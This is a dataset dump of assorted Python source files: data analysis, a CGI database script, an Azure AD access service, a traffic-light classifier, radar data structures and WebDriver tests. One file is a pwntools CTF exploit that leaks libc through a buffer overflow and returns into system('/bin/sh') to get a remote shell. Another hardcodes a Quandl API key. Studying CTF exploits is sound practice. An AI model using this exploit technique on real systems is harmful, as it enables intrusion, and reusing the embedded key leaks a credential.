id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
3276391 | <reponame>yull1860outlook/Data-Analysis<filename>sentdex_data_analysis/pandas_joiningData.py
import pickle
import pandas as pd
import quandl
import matplotlib.pyplot as plt
from matplotlib import style
style.use("seaborn")
quandl.ApiConfig.api_key = "rFsSehe51RLzREtYhLfo"
def mortgage_30yr():
df = quandl.get("FMAC/MORTG")
df = df[df.index > "1974-12-01"]
df = (df["Value"] - df["Value"][0]) / df["Value"][0] * 100
df = df.resample("M").mean()
return df
ax1 = plt.subplot(2, 1, 1)
ax2 = plt.subplot(2, 1, 2, sharex=ax1)
# initial_state_data()
pickle_in = open("fifty_states_pct.pickle", "rb")
HPI_data = pickle.load(pickle_in)
# HPI_Benchmark()
pickle_in = open("us_pct.pickle", "rb")
benchmark = pickle.load(pickle_in)
m30 = mortgage_30yr()
HPI_Bench = benchmark
state_HPI_M30 = HPI_data.join(m30)
state_HPI_M30.rename({"Value": "M30"}, inplace=True)
print(state_HPI_M30.corr().describe()["Value"])
| StarcoderdataPython |
179128 | <gh_stars>0
#!_PYTHONLOC
#
# (C) COPYRIGHT 2004-2021 Ahasuerus and <NAME>
# ALL RIGHTS RESERVED
#
# The copyright notice above does not evidence any actual or
# intended publication of such source code.
#
# Version: $Revision$
# Date: $Date$
import cgi
import sys
import MySQLdb
import string
from isfdb import *
from isfdblib import *
from SQLparsing import *
from common import *
from library import *
debug = 0
def DoError(text):
print '<div id="ErrorBox">'
print '<h3>%s</h3>' % text
print '</div>'
PrintPostMod()
sys.exit(0)
def DoSubmission(db, submission):
title_id =0
award_id = 0
xml = SQLloadXML(submission)
doc = minidom.parseString(XMLunescape2(xml))
if doc.getElementsByTagName('LinkAward'):
merge = doc.getElementsByTagName('LinkAward')
print "<ul>"
if TagPresent(merge, 'Title'):
title_id = int(GetElementValue(merge, 'Title'))
else:
DoError('No Title record specified')
if TagPresent(merge, 'Award'):
award_id = int(GetElementValue(merge, 'Award'))
if award_id < 1:
raise
else:
DoError('No valid award record specified')
update = "delete from title_awards where award_id='%d';" % award_id
print "<li> ", update
if debug == 0:
db.query(update)
if int(title_id):
update = "insert into title_awards(title_id, award_id) values(%d, %d);" % (title_id, award_id)
print "<li> ", update
if debug == 0:
db.query(update)
submitter = GetElementValue(merge, 'Submitter')
if debug == 0:
markIntegrated(db, submission, award_id)
return (title_id, award_id)
if __name__ == '__main__':
submission = SESSION.Parameter(0, 'int')
PrintPreMod('Link Award - SQL Statements')
PrintNavBar()
if NotApprovable(submission):
sys.exit(0)
print '<h1>SQL Updates:</h1>'
print '<hr>'
(title_id, award_id) = DoSubmission(db, submission)
if title_id > 0:
print ISFDBLinkNoName('title.cgi', title_id, 'View Title record', True)
if award_id > 0:
print ISFDBLinkNoName('award_details.cgi', award_id, 'View Award record', True)
print '<p>'
PrintPostMod(0)
| StarcoderdataPython |
1673338 | import logging
import requests
from msal import ConfidentialClientApplication
from core import config
from models.domain.workspace import Workspace, WorkspaceRole
from resources import strings
from services.access_service import AccessService, AuthConfigValidationError
from services.authentication import User
class AADAccessService(AccessService):
@staticmethod
def _get_msgraph_token() -> str:
scopes = ["https://graph.microsoft.com/.default"]
app = ConfidentialClientApplication(client_id=config.API_CLIENT_ID, client_credential=config.API_CLIENT_SECRET, authority=f"{config.AAD_INSTANCE}/{config.AAD_TENANT_ID}")
result = app.acquire_token_silent(scopes=scopes, account=None)
if not result:
logging.info('No suitable token exists in cache, getting a new one from AAD')
result = app.acquire_token_for_client(scopes=scopes)
if "access_token" not in result:
logging.debug(result.get('error'))
logging.debug(result.get('error_description'))
logging.debug(result.get('correlation_id'))
raise Exception(result.get('error'))
return result["access_token"]
@staticmethod
def _get_auth_header(msgraph_token: str) -> dict:
return {'Authorization': 'Bearer ' + msgraph_token}
@staticmethod
def _get_service_principal_endpoint(app_id) -> str:
return f"https://graph.microsoft.com/v1.0/serviceprincipals?$filter=appid eq '{app_id}'"
def _get_app_sp_graph_data(self, app_id: str) -> dict:
msgraph_token = self._get_msgraph_token()
sp_endpoint = self._get_service_principal_endpoint(app_id)
graph_data = requests.get(sp_endpoint, headers=self._get_auth_header(msgraph_token)).json()
return graph_data
def _get_app_auth_info(self, app_id: str) -> dict:
graph_data = self._get_app_sp_graph_data(app_id)
if 'value' not in graph_data or len(graph_data['value']) == 0:
logging.debug(graph_data)
raise AuthConfigValidationError(f"{strings.ACCESS_UNABLE_TO_GET_INFO_FOR_APP} {app_id}")
app_info = graph_data['value'][0]
sp_id = app_info['id']
roles = app_info['appRoles']
return {
'sp_id': sp_id,
'roles': {role['value']: role['id'] for role in roles}
}
def _get_role_assignment_graph_data(self, user_id: str) -> dict:
msgraph_token = self._get_msgraph_token()
user_endpoint = f"https://graph.microsoft.com/v1.0/users/{user_id}/appRoleAssignments"
graph_data = requests.get(user_endpoint, headers=self._get_auth_header(msgraph_token)).json()
return graph_data
def extract_workspace_auth_information(self, data: dict) -> dict:
if "app_id" not in data:
raise AuthConfigValidationError(strings.ACCESS_PLEASE_SUPPLY_APP_ID)
auth_info = self._get_app_auth_info(data["app_id"])
for role in ['WorkspaceOwner', 'WorkspaceResearcher']:
if role not in auth_info['roles']:
raise AuthConfigValidationError(f"{strings.ACCESS_APP_IS_MISSING_ROLE} {role}")
return auth_info
def get_user_role_assignments(self, user_id: str) -> dict:
graph_data = self._get_role_assignment_graph_data(user_id)
if 'value' not in graph_data:
logging.debug(graph_data)
raise AuthConfigValidationError(f"{strings.ACCESS_UNABLE_TO_GET_ROLE_ASSIGNMENTS_FOR_USER} {user_id}")
return {role_assignment['resourceId']: role_assignment['appRoleId'] for role_assignment in graph_data['value']}
@staticmethod
def get_workspace_role(user: User, workspace: Workspace) -> WorkspaceRole:
if 'sp_id' not in workspace.authInformation or 'roles' not in workspace.authInformation:
raise AuthConfigValidationError(strings.AUTH_CONFIGURATION_NOT_AVAILABLE_FOR_WORKSPACE)
workspace_sp_id = workspace.authInformation['sp_id']
workspace_roles = workspace.authInformation['roles']
if 'WorkspaceOwner' not in workspace_roles or 'WorkspaceResearcher' not in workspace_roles:
raise AuthConfigValidationError(strings.AUTH_CONFIGURATION_NOT_AVAILABLE_FOR_WORKSPACE)
if workspace_sp_id in user.roleAssignments:
if workspace_roles['WorkspaceOwner'] == user.roleAssignments[workspace_sp_id]:
return WorkspaceRole.Owner
if workspace_roles['WorkspaceResearcher'] == user.roleAssignments[workspace_sp_id]:
return WorkspaceRole.Researcher
return WorkspaceRole.NoRole
| StarcoderdataPython |
3256116 | <reponame>nhtri2003gmail/ctf-write-ups
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./chall_13')
context.log_level = 'INFO'
if not args.REMOTE:
context.log_file = 'local.log'
libc = binary.libc
p = process(binary.path)
else:
context.log_file = 'remote.log'
libc_index = 1
p = remote('chal.2020.sunshinectf.org', 30013)
p.sendlineafter('Keep on writing\n','foobar')
payload = 0x3e * b'A'
payload += p32(binary.plt.puts)
payload += p32(binary.sym.vuln)
payload += p32(binary.got.puts)
p.sendline(payload)
_ = p.recv(4)
puts = u32(_)
log.info('puts: ' + hex(puts))
p.recv(20)
if not 'libc' in locals():
try:
import requests
r = requests.post('https://libc.rip/api/find', json = {'symbols':{'puts':hex(puts)[-3:]}})
libc_url = r.json()[libc_index]['download_url']
libc_file = libc_url.split('/')[-1:][0]
if not os.path.exists(libc_file):
log.info('getting: ' + libc_url)
r = requests.get(libc_url, allow_redirects=True)
open(libc_file,'wb').write(r.content)
except:
log.critical('get libc yourself!')
sys.exit(0)
libc = ELF(libc_file)
libc.address = puts - libc.sym.puts
log.info('libc.address: ' + hex(libc.address))
payload = 0x3e * b'A'
payload += p32(libc.sym.system)
payload += 4 * b'B'
payload += p32(libc.search(b'/bin/sh').__next__())
p.sendline(payload)
p.interactive()
| StarcoderdataPython |
3319973 | from styx_msgs.msg import TrafficLight
import rospy
import tensorflow as tf
import numpy as np
import os
import cv2
class TLClassifier(object):
def __init__(self, model_name):
# Variables
PATH_TO_CKPT = os.path.join(model_name, 'frozen_inference_graph.pb')
self.tl_colors = ['Red', 'Yellow', 'Green', '-', 'Undefined']
self.tl_colorCodes = [(0, 0, 255), (0, 255, 255), (0, 255, 0), (0, 0, 0), (200, 200, 200)]
# Load frozen TF model to memory
self.detection_graph = tf.Graph()
with self.detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
# Definite input and output Tensors for self.detection_graph
self.image_tensor = self.detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
self.detection_boxes = self.detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
self.detection_scores = self.detection_graph.get_tensor_by_name('detection_scores:0')
self.detection_classes = self.detection_graph.get_tensor_by_name('detection_classes:0')
self.num_detections = self.detection_graph.get_tensor_by_name('num_detections:0')
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
self.sess = tf.Session(graph=self.detection_graph, config=config)
# Variables for frames skipping when running on a CPU
self.on_gpu = tf.test.is_gpu_available(cuda_only=True)
self.skip_frame = False
self.last_state = TrafficLight.UNKNOWN
self.last_image_np = np.zeros(1)
def get_classification(self, image, roi):
"""Determines the color of the traffic light in the image
Args:
image (cv::Mat): image containing the traffic light
Returns:
int: ID of traffic light color (specified in styx_msgs/TrafficLight)
image (cv::Mat): image containing debug detection output
"""
tl_state = TrafficLight.UNKNOWN
# Input image preprocessing
image_np = np.array(image).astype(np.uint8)
ymin = int(roi[0] * image_np.shape[0])
xmin = int(roi[1] * image_np.shape[1])
ymax = int(roi[2] * image_np.shape[0])
xmax = int(roi[3] * image_np.shape[1])
image_cropped = image_np[ymin:ymax, xmin:xmax]
# Frames skipping when running on a CPU
if not self.on_gpu and self.skip_frame:
self.skip_frame = not self.skip_frame
return self.last_state, self.last_image_np
# Expand dimensions since the model expects images
# to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_cropped, axis=0)
# Actual detection.
(boxes, scores, classes, num) = self.sess.run(
[self.detection_boxes, self.detection_scores,
self.detection_classes, self.num_detections],
feed_dict={self.image_tensor: image_np_expanded})
# Filter for robust tl_classification when there are multiple of them
tl_states = []
for bbox, score, clas in zip(boxes[0], scores[0], classes[0]):
if (score > 0.3) and (clas == 10) and \
(0.07/(roi[2]-roi[0]) < (bbox[2] - bbox[0]) < 0.5/(roi[2]-roi[0])):
ytl = int(bbox[0] * image_cropped.shape[0])
xtl = int(bbox[1] * image_cropped.shape[1])
ybr = int(bbox[2] * image_cropped.shape[0])
xbr = int(bbox[3] * image_cropped.shape[1])
### Classify the color of the traffic light
# Crop the tl bbox
tl_img = image_cropped[ytl:ybr, xtl:xbr]
# Crop margins
offset = int(tl_img.shape[1]/4)
cr_img = tl_img[offset:-offset, offset:-offset]
# Aspect ratio check
asp_rat = cr_img.shape[0] / cr_img.shape[1]
if 1.5 < asp_rat < 5:
# Convert to HSV and extract Value part from the image
if cv2.__version__ < '3.0.0':
cr_v_img = cv2.cvtColor(cr_img, cv2.cv.CV_BGR2HSV)[:,:,2]
else:
cr_v_img = cv2.cvtColor(cr_img, cv2.COLOR_BGR2HSV)[:,:,2]
# Finding mean intensities of each section
section_h = int(cr_img.shape[0]/3)
sections = np.hstack((np.mean(cr_v_img[:section_h]),
np.mean(cr_v_img[section_h:2*section_h]),
np.mean(cr_v_img[2*section_h:])))
tl_st = np.argmax(sections)
tl_states.append(tl_st)
# Draw debug information on the frame
try:
cv2.rectangle(image_np, (xmin+xtl, ymin+ytl),
(xmin+xbr, ymin+ybr),
self.tl_colorCodes[tl_st], 3)
except:
pass
txt = '%s: %.2f'%(self.tl_colors[tl_st][0], score)
bot_pos = ymin+ytl-10 if ymin+ytl-10 > 30 else ymin+ybr+25
left_pos = xmin+xtl if xmin+xtl > 0 else 0
try:
cv2.putText(image_np, txt, (left_pos, bot_pos),
cv2.FONT_HERSHEY_SIMPLEX, 0.8,
self.tl_colorCodes[tl_st], 2)
except:
pass
else:
tl_st = TrafficLight.UNKNOWN
# debug
rospy.logdebug("%s: %.3f, bbox: %s"%(self.tl_colors[tl_st], score, bbox))
if len(set(tl_states)) == 1:
tl_state = tl_states[0]
try:
cv2.rectangle(image_np, (xmin, ymin), (xmax, ymax),
self.tl_colorCodes[tl_state], 15)
except:
pass
# Update variables for frames skipping when running on a CPU
if not self.on_gpu:
self.last_state = tl_state
self.skip_frame = not self.skip_frame
self.last_image_np = image_np
return tl_state, image_np
| StarcoderdataPython |
3364617 | <gh_stars>0
from m5.SimObject import SimObject
from m5.params import *
from m5.proxy import *
class BaseEnergySM(SimObject):
type = 'BaseEnergySM'
cxx_header = "engy/state_machine.hh" | StarcoderdataPython |
4835229 | class SubrectangleQueries(object):
# Runtime: 192 ms
# Memory: 15 MB
def __init__(self, rectangle):
"""
:type rectangle: List[List[int]]
"""
self.rectangle = rectangle
def updateSubrectangle(self, row1, col1, row2, col2, newValue):
"""
:type row1: int
:type col1: int
:type row2: int
:type col2: int
:type newValue: int
:rtype: None
"""
for r in range(row1, row2 + 1):
for c in range(col1, col2 + 1):
self.rectangle[r][c] = newValue
def getValue(self, row, col):
"""
:type row: int
:type col: int
:rtype: int
"""
return self.rectangle[row][col]
# Your SubrectangleQueries object will be instantiated and called as such:
# obj = SubrectangleQueries(rectangle)
# obj.updateSubrectangle(row1,col1,row2,col2,newValue)
# param_2 = obj.getValue(row,col)
| StarcoderdataPython |
4841030 | """
The SRP definition for CPHD 0.3.
"""
from typing import Union
import numpy
from sarpy.compliance import integer_types
from sarpy.io.phase_history.cphd1_elements.base import DEFAULT_STRICT
# noinspection PyProtectedMember
from sarpy.io.complex.sicd_elements.base import Serializable, _SerializableDescriptor, \
_IntegerEnumDescriptor
__classification__ = "UNCLASSIFIED"
__author__ = "<NAME>"
class FxParametersType(Serializable):
"""
The FX vector parameters.
"""
_fields = ('Fx0', 'Fx_SS', 'Fx1', 'Fx2')
_required = _fields
# descriptors
Fx0 = _IntegerEnumDescriptor(
'Fx0', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
docstring='The size of the Fx0 field') # type: int
Fx_SS = _IntegerEnumDescriptor(
'Fx_SS', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
docstring='The size of the Fx_SS field') # type: int
Fx1 = _IntegerEnumDescriptor(
'Fx1', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
docstring='The size of the Fx1 field') # type: int
Fx2 = _IntegerEnumDescriptor(
'Fx2', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
docstring='The size of the Fx2 field') # type: int
def __init__(self, Fx0=8, Fx_SS=8, Fx1=8, Fx2=8, **kwargs):
if '_xml_ns' in kwargs:
self._xml_ns = kwargs['_xml_ns']
if '_xml_ns_key' in kwargs:
self._xml_ns_key = kwargs['_xml_ns_key']
self.Fx0 = Fx0
self.Fx1 = Fx1
self.Fx2 = Fx2
self.Fx_SS = Fx_SS
super(FxParametersType, self).__init__(**kwargs)
@staticmethod
def get_size():
"""
The size in bytes of this component of the vector.
Returns
-------
int
"""
return 32
def get_position_offset_and_size(self, field):
"""
Get the offset and size of the given field from the beginning of the vector.
Parameters
----------
field : str
Returns
-------
None|int
"""
if field not in self._fields:
return None
out = 0
for fld in self._fields:
val = getattr(self, fld)
if fld == field:
return out, val
else:
out += val
return None
def get_dtype_components(self):
"""
Gets the dtype components.
Returns
-------
List[Tuple]
"""
return [(entry, '>f8') for entry in self._fields]
class TOAParametersType(Serializable):
"""
The TOA vector parameters.
"""
_fields = ('DeltaTOA0', 'TOA_SS')
_required = _fields
# descriptors
DeltaTOA0 = _IntegerEnumDescriptor(
'DeltaTOA0', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
docstring='The size of the DeltaTOA0 field') # type: int
TOA_SS = _IntegerEnumDescriptor(
'TOA_SS', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
docstring='The size of the TOA_SS field') # type: int
def __init__(self, DeltaTOA0=8, TOA_SS=8, **kwargs):
if '_xml_ns' in kwargs:
self._xml_ns = kwargs['_xml_ns']
if '_xml_ns_key' in kwargs:
self._xml_ns_key = kwargs['_xml_ns_key']
self.DeltaTOA0 = DeltaTOA0
self.TOA_SS = TOA_SS
super(TOAParametersType, self).__init__(**kwargs)
@staticmethod
def get_size():
"""
The size in bytes of this component of the vector.
Returns
-------
int
"""
return 16
def get_position_offset_and_size(self, field):
"""
Get the offset and size of the given field from the beginning of the vector.
Parameters
----------
field : str
Returns
-------
None|(int, int)
"""
if field not in self._fields:
return None
out = 0
for fld in self._fields:
val = getattr(self, fld)
if fld == field:
return out, val
else:
out += val
return None
def get_dtype_components(self):
"""
Gets the dtype components.
Returns
-------
List[Tuple]
"""
return [(entry, '>f8') for entry in self._fields]
class VectorParametersType(Serializable):
"""
The vector parameters sizes object.
"""
_fields = (
'TxTime', 'TxPos', 'RcvTime', 'RcvPos', 'SRPTime', 'SRPPos', 'AmpSF', 'TropoSRP',
'FxParameters', 'TOAParameters')
_required = (
'TxTime', 'TxPos', 'RcvTime', 'RcvPos', 'SRPPos')
_choice = ({'required': False, 'collection': ('FxParameters', 'TOAParameters')}, )
# descriptors
TxTime = _IntegerEnumDescriptor(
'TxTime', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
docstring='The size of the TxTime field') # type: int
TxPos = _IntegerEnumDescriptor(
'TxPos', (24, ), _required, strict=DEFAULT_STRICT, default_value=8,
docstring='The size of the TxPos field') # type: int
RcvTime = _IntegerEnumDescriptor(
'RcvTime', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
docstring='The size of the RcvTime field') # type: int
RcvPos = _IntegerEnumDescriptor(
'RcvPos', (24, ), _required, strict=DEFAULT_STRICT, default_value=8,
docstring='The size of the RcvPos field') # type: int
SRPTime = _IntegerEnumDescriptor(
'SRPTime', (8, ), _required, strict=DEFAULT_STRICT, default_value=None,
docstring='The size of the SRPTime field') # type: int
SRPPos = _IntegerEnumDescriptor(
'SRPPos', (24, ), _required, strict=DEFAULT_STRICT, default_value=8,
docstring='The size of the SRPPos field') # type: int
AmpSF = _IntegerEnumDescriptor(
'AmpSF', (8, ), _required, strict=DEFAULT_STRICT, default_value=None,
docstring='The size of the AmpSF field') # type: int
TropoSRP = _IntegerEnumDescriptor(
'TropoSRP', (8, ), _required, strict=DEFAULT_STRICT, default_value=None,
docstring='The size of the TropoSRP field') # type: int
FxParameters = _SerializableDescriptor(
'FxParameters', FxParametersType, _required, strict=DEFAULT_STRICT,
docstring='The frequency parameters, only present when DomainType is '
'FX.') # type: Union[None, FxParametersType]
TOAParameters = _SerializableDescriptor(
'TOAParameters', FxParametersType, _required, strict=DEFAULT_STRICT,
docstring='The TOA parameters, only present when DomainType is '
'TOA.') # type: Union[None, TOAParametersType]
def __init__(self, TxTime=8, TxPos=24, RcvTime=8, RcvPos=24, SRPTime=None, SRPPos=24,
AmpSF=None, TropoSRP=None, FxParameters=None, TOAParameters=None, **kwargs):
"""
Parameters
----------
TxTime : int
TxPos : int
RcvTime : int
RcvPos : int
SRPTime : None|int
SRPPos : int
AmpSF : None|int
TropoSRP : None|int
FxParameters : None|FxParametersType
TOAParameters : None|TOAParametersType
kwargs
"""
if '_xml_ns' in kwargs:
self._xml_ns = kwargs['_xml_ns']
if '_xml_ns_key' in kwargs:
self._xml_ns_key = kwargs['_xml_ns_key']
self.TxTime = TxTime
self.TxPos = TxPos
self.RcvTime = RcvTime
self.RcvPos = RcvPos
self.SRPTime = SRPTime
self.SRPPos = SRPPos
self.AmpSF = AmpSF
self.TropoSRP = TropoSRP
self.FxParameters = FxParameters
self.TOAParameters = TOAParameters
super(VectorParametersType, self).__init__(**kwargs)
def get_size(self):
"""
The size in bytes of this component of the vector.
Returns
-------
int
"""
out = 0
for fld in self._fields:
val = getattr(self, fld)
if val is None:
pass
elif isinstance(val, integer_types):
out += val
elif isinstance(val, (FxParametersType, TOAParametersType)):
out += val.get_size()
else:
raise TypeError('Got unhandled type {}'.format(type(val)))
return out
def get_position_offset_and_size(self, field):
"""
Get the offset and size of the given field from the beginning of the vector.
Parameters
----------
field : str
Returns
-------
None|(int, int)
"""
out = 0
for fld in self._fields:
val = getattr(self, fld)
if fld == field:
if val is not None:
return out, val
else:
return None
if val is None:
pass
elif isinstance(val, integer_types):
out += val
elif isinstance(val, (FxParametersType, TOAParametersType)):
res = val.get_position_offset_and_size(field)
if res is not None:
return out+res[0], res[1]
else:
out += val.get_size()
else:
raise TypeError('Got unhandled type {}'.format(type(val)))
return None
def get_vector_dtype(self):
"""
Gets the dtype for the corresponding structured array for the full PVP array.
Returns
-------
numpy.dtype
This will be a compound dtype for a structured array.
"""
the_type_info = []
for fld in self._fields:
val = getattr(self, fld)
if val is None:
continue
if fld in ['FxParameters', 'TOAParameters']:
the_type_info.extend(val.get_dtype_components())
else:
assert isinstance(val, integer_types), 'CPHD 0.3 PVP field {} should be an integer, got {}'.format(fld, val)
if val == 8:
the_type_info.append((fld, '>f8'))
elif val == 24:
the_type_info.append((fld, '>f8', (3, )))
else:
raise ValueError('Got unhandled value {} for CPHD 0.3 PVP field {}'.format(val, fld))
return numpy.dtype(the_type_info)
| StarcoderdataPython |
1741834 | <filename>leo/plugins/obsolete/gtkGui.py
#@+leo-ver=4-thin
#@+node:ekr.20080112150934:@thin gtkGui.py
'''The plugin part of the gtk gui code.'''
import leoGlobals as g
import leoGtkGui
try:
import gtk
except ImportError:
gtk = None
g.es_print('can not import gtk')
#@+others
#@+node:ekr.20080112150934.1:init
def init():
if g.app.unitTesting: # Not Ok for unit testing!
return False
if not gtk:
return False
if g.app.gui:
return g.app.gui.guiName() == 'gtk'
else:
g.app.gui = leoGtkGui.gtkGui()
# g.app.root = g.app.gui.createRootWindow()
g.app.gui.finishCreate()
g.plugin_signon(__name__)
return True
#@-node:ekr.20080112150934.1:init
#@-others
#@-node:ekr.20080112150934:@thin gtkGui.py
#@-leo
| StarcoderdataPython |
108461 | <reponame>hiikezoe/web-platform-tests
# META: timeout=long
from tests.support.inline import inline
from tests.support.asserts import assert_error, assert_success, assert_dialog_handled
from tests.support.fixtures import create_dialog
alert_doc = inline("<script>window.alert()</script>")
def read_global(session, name):
return session.execute_script("return %s;" % name)
def fullscreen(session):
return session.transport.send("POST", "session/%s/window/fullscreen" % session.session_id)
# 10.7.5 Fullscreen Window
# 1. If the current top-level browsing context is no longer open, return error
# with error code no such window.
def test_no_browsing_context(session, create_window):
# step 1
session.window_handle = create_window()
session.close()
response = fullscreen(session)
assert_error(response, "no such window")
# [...]
# 2. Handle any user prompts and return its value if it is an error.
# [...]
# In order to handle any user prompts a remote end must take the following
# steps:
# 2. Run the substeps of the first matching user prompt handler:
#
# [...]
# - accept state
# 1. Accept the current user prompt.
# [...]
#
# 3. Return success.
def test_handle_prompt_accept(new_session):
_, session = new_session({"alwaysMatch": {"unhandledPromptBehavior": "accept"}})
session.url = inline("<title>WD doc title</title>")
create_dialog(session)("alert", text="accept #1", result_var="accept1")
expected_title = read_global(session, "document.title")
response = fullscreen(session)
assert_success(response, expected_title)
assert_dialog_handled(session, "accept #1")
assert read_global(session, "accept1") == None
expected_title = read_global(session, "document.title")
create_dialog(session)("confirm", text="accept #2", result_var="accept2")
response = fullscreen(session)
assert_success(response, expected_title)
assert_dialog_handled(session, "accept #2")
assert read_global(session, "accept2"), True
expected_title = read_global(session, "document.title")
create_dialog(session)("prompt", text="accept #3", result_var="accept3")
response = fullscreen(session)
assert_success(response, expected_title)
assert_dialog_handled(session, "accept #3")
assert read_global(session, "accept3") == ""
# [...]
# 2. Handle any user prompts and return its value if it is an error.
# [...]
# In order to handle any user prompts a remote end must take the following
# steps:
# 2. Run the substeps of the first matching user prompt handler:
#
# [...]
# - missing value default state
# - not in the table of simple dialogs
# 1. Dismiss the current user prompt.
# 2. Return error with error code unexpected alert open.
def test_handle_prompt_missing_value(session, create_dialog):
session.url = inline("<title>WD doc title</title>")
create_dialog("alert", text="dismiss #1", result_var="dismiss1")
response = fullscreen(session)
assert_error(response, "unexpected alert open")
assert_dialog_handled(session, "dismiss #1")
assert read_global(session, "accept1") == None
create_dialog("confirm", text="dismiss #2", result_var="dismiss2")
response = fullscreen(session)
assert_error(response, "unexpected alert open")
assert_dialog_handled(session, "dismiss #2")
assert read_global(session, "dismiss2") == False
create_dialog("prompt", text="dismiss #3", result_var="dismiss3")
response = fullscreen(session)
assert_error(response, "unexpected alert open")
assert_dialog_handled(session, "dismiss #3")
assert read_global(session, "dismiss3") == None
# 4. Call fullscreen an element with the current top-level browsing
# context's active document's document element.
def test_fullscreen(session):
# step 4
response = fullscreen(session)
assert_success(response)
assert session.execute_script("return window.fullScreen") == True
# 5. Return success with the JSON serialization of the current top-level
# browsing context's window rect.
#
# [...]
#
# A top-level browsing context's window rect is defined as a
# dictionary of the screenX, screenY, width and height attributes of the
# WindowProxy. Its JSON representation is the following:
#
# x
# WindowProxy's screenX attribute.
#
# y
# WindowProxy's screenY attribute.
#
# width
# Width of the top-level browsing context's outer dimensions,
# including any browser chrome and externally drawn window
# decorations in CSS reference pixels.
#
# height
# Height of the top-level browsing context's outer dimensions,
# including any browser chrome and externally drawn window decorations
# in CSS reference pixels.
#
# state
# The top-level browsing context's window state.
#
# [...]
#
# The top-level browsing context has an associated window state which
# describes what visibility state its OS widget window is in. It can be
# in one of the following states:
#
# "maximized"
# The window is maximized.
#
# "minimized"
# The window is iconified.
#
# "normal"
# The window is shown normally.
#
# "fullscreen"
# The window is in full screen mode.
#
# If for whatever reason the top-level browsing context's OS window
# cannot enter either of the window states, or if this concept is not
# applicable on the current system, the default state must be normal.
def test_payload(session):
response = fullscreen(session)
# step 5
assert response.status == 200
assert isinstance(response.body["value"], dict)
rect = response.body["value"]
assert "width" in rect
assert "height" in rect
assert "x" in rect
assert "y" in rect
assert isinstance(rect["width"], (int, float))
assert isinstance(rect["height"], (int, float))
assert isinstance(rect["x"], (int, float))
assert isinstance(rect["y"], (int, float))
def test_fullscreen_twice_is_idempotent(session):
assert session.execute_script("return window.fullScreen") is False
first_response = fullscreen(session)
assert_success(first_response)
assert session.execute_script("return window.fullScreen") is True
second_response = fullscreen(session)
assert_success(second_response)
assert session.execute_script("return window.fullScreen") is True
| StarcoderdataPython |
4834253 | import numpy as np
import cv2
import logging
logger = logging.getLogger(__name__)
from ipapi.base.ipt_abstract import IptBase
import ipapi.base.ip_common as ipc
class IptSplittedRangeThreshold(IptBase):
def build_params(self):
self.add_enabled_checkbox()
self.add_channel_selector(default_value="h")
self.add_checkbox(name="invert", desc="Invert mask", default_value=0)
self.add_roi_selector()
self.add_spin_box(
name="min_inside_t",
desc="Threshold min value inside ROI",
default_value=0,
minimum=0,
maximum=255,
)
self.add_spin_box(
name="max_inside_t",
desc="Threshold max value inside ROI",
default_value=255,
minimum=0,
maximum=255,
)
self.add_spin_box(
name="min_outside_t",
desc="Threshold min value outside ROI",
default_value=0,
minimum=0,
maximum=255,
)
self.add_spin_box(
name="max_outside_t",
desc="Threshold max value outside ROI",
default_value=255,
minimum=0,
maximum=255,
)
self.add_spin_box(
name="median_filter_size",
desc="Median filter size (odd values only)",
default_value=0,
minimum=0,
maximum=51,
)
self.add_morphology_operator()
self.add_text_overlay(0)
self.add_checkbox(
name="build_mosaic",
desc="Build mosaic",
default_value=0,
hint="If true edges and result will be displayed side by side",
)
self.add_color_selector(
name="background_color",
desc="Background color",
default_value="none",
hint="""Color to be used when printing masked image.\n
if "None" is selected standard mask will be printed.""",
enable_none=True,
)
def process_wrapper(self, **kwargs):
"""
Splitted range threshold:
Performs range threshold with two sets of borders applied inside and outside of linked ROIs.
If no ROIs are provided, all image will be considered within ROI.
Real time: True
Keyword Arguments (in parentheses, argument name):
* Activate tool (enabled): Toggle whether or not tool is active
* Channel (channel):
* Invert mask (invert):
* Name of ROI to be used (roi_names): Operation will only be applied inside of ROI
* ROI selection mode (roi_selection_mode):
* Threshold min value inside ROI (min_inside_t):
* Threshold max value inside ROI (max_inside_t):
* Threshold min value outside ROI (min_outside_t):
* Threshold max value outside ROI (max_outside_t):
* Median filter size (odd values only) (median_filter_size):
* Morphology operator (morph_op):
* Kernel size (kernel_size):
* Kernel shape (kernel_shape):
* Iterations (proc_times):
* Overlay text on top of images (text_overlay): Draw description text on top of images
* Build mosaic (build_mosaic): If true edges and result will be displayed side by side
* Background color (background_color):
Color to be used when printing masked image.
if "None" is selected standard mask will be printed.
"""
wrapper = self.init_wrapper(**kwargs)
if wrapper is None:
return False
res = False
try:
if self.get_value_of("enabled") == 1:
img = wrapper.current_image
rois = self.get_ipt_roi(
wrapper=wrapper,
roi_names=self.get_value_of("roi_names").replace(" ", "").split(","),
selection_mode=self.get_value_of("roi_selection_mode"),
)
# Build inside mask
inside_mask, _ = wrapper.get_mask(
src_img=img,
channel=self.get_value_of("channel"),
min_t=self.get_value_of("min_inside_t"),
max_t=self.get_value_of("max_inside_t"),
median_filter_size=self.get_value_of("median_filter_size"),
)
inside_mask = wrapper.keep_rois(src_mask=inside_mask, tags=rois)
wrapper.store_image(
image=inside_mask, text=f"inside_mask_{self.get_value_of('channel')}"
)
# Build outside mask
outside_mask, _ = wrapper.get_mask(
src_img=img,
channel=self.get_value_of("channel"),
min_t=self.get_value_of("min_outside_t"),
max_t=self.get_value_of("max_outside_t"),
median_filter_size=self.get_value_of("median_filter_size"),
)
outside_mask = wrapper.delete_rois(src_mask=outside_mask, tags=rois)
wrapper.store_image(
